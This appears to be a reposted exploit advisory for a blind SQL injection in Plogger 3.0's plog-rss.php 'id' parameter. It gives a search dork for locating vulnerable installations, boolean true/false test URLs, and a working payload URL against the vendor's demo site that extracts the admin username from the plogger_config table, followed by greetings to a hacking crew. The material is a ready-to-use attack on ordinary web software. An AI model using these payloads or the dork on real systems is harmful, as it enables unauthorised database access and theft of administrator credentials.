Plogger 3.0

============================================

[0] Plogger 3.0 Remote Blind SQL Injection Vulnerability

Software : Plogger 3.0
Vendor : http://www.plogger.org/
Author : Angela Chang
Contact : [email protected]
Date : 11 August 2009
================================================


[o] Dork

"Powered by Plogger"


[+] Vulnerabilities
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=1 <-- true
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=2 <-- false



[o] Demo Site

http://www.plogger.org/demo/plog-rss.php?level=collection&id=2%20and%20substring((SELECT%20admin_username%20FROM%20plogger_config%20LIMIT%200,1),1,5)=char(97,100,109,105,110)

================================================



[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

===============================================

0 komentar:

Posting Komentar